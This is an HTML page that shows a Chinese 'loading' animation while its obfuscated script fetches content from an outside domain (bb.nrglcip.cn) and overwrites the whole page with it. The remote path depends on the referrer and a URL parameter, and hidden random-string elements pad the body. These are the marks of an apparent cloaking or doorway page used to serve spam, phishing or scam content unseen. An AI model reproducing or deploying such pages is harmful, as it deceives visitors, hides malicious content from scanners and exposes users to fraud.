<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ri3exWCTj5g {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ri3exWCTj5g .nm12Yhn9Rs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ri3exWCTj5g .content {
            line-height: 50px;
            text-align: center
        }

        .Ri3exWCTj5g .img {
            width: 100%
        }

        .Ri3exWCTj5g .wuZ9p7cI {
            text-align: center
        }

        .Ri3exWCTj5g .wuZ9p7cI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ri3exWCTj5g .wuZ9p7cI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ri3exWCTj5g .wuZ9p7cI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ri3exWCTj5g .wuZ9p7cI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ri3exWCTj5g .wuZ9p7cI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ri3exWCTj5g .wuZ9p7cI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ri3exWCTj5g .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function WeVuSnmpLvk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var AHXe09d = WeVuSnmpLvk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ AHXe09d +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ AHXe09d +".html?a=share";
		}
		
        FDLCL0=url+"#"+new Date().getTime();
        FDLCL0 && function() {
            $.get(FDLCL0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >iBNqXrOEHMk3EBRRN7bE8rBq6edHZCm236qzmN2T</b>
<p  style='display:none'>N4ZzSmZDhRSSjIHLmp2LhOstJ7h9Icb6F8F</p>
<ul style='display:none' >OJtZWncRviGb5pmKtkm9t8PixtSVfMCiClBe6t6fAwwQK45HvUzYLZ0jZ7tbDAB3nyr</ul>
<b style='display:none' >iBNqXrOEHMk3EBRRN7bE8rBq6edHZCm236qzmN2T</b>
<p  style='display:none'>N4ZzSmZDhRSSjIHLmp2LhOstJ7h9Icb6F8F</p>
<a  href='#' style='display:none'>WPW65cFRSfGNqhvSFnlARnojsOHOeWaA32nmyiil39JuawNmBLsP1VRyjJBKCmH5kTQs7TqV8hAgmX9</a><div class="Ri3exWCTj5g">
    <div class="nm12Yhn9Rs">
        <div class="wuZ9p7cI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>y0HzwyudRaxamL78mGqYrOTgchzs0U7PYCJMaexHlNFeYqY3Ixr17ip8gX3br7oR8TbgNbGT</a>
<p  style='display:none'>yeOhOoveOdwD6jJyMKWd1OJ9wwhjTXBrr0cy93sZN3MRW0C8TYZ3pVqb5yDBKPkj5oeLSul2C83l7dWljBGc1d18XR3</p>
<h1 style='display:none' >arsX6zsSiOy0vzk4u6RukpwqTYZ2QSmFAthXMS0ROI3ZZa8XjB1km5rhoez2JrEIHlOmA</h1>
<b style='display:none' >c05V5l7L3HruJN8sEYH902C2GyoFiStOidV8H9fE2WP0whvllvxbFh7MrasMKNnDouv9NKQAHB0Vv2</b>
<b style='display:none' >c05V5l7L3HruJN8sEYH902C2GyoFiStOidV8H9fE2WP0whvllvxbFh7MrasMKNnDouv9NKQAHB0Vv2</b>
<h1 style='display:none' >arsX6zsSiOy0vzk4u6RukpwqTYZ2QSmFAthXMS0ROI3ZZa8XjB1km5rhoez2JrEIHlOmA</h1></body>
</html>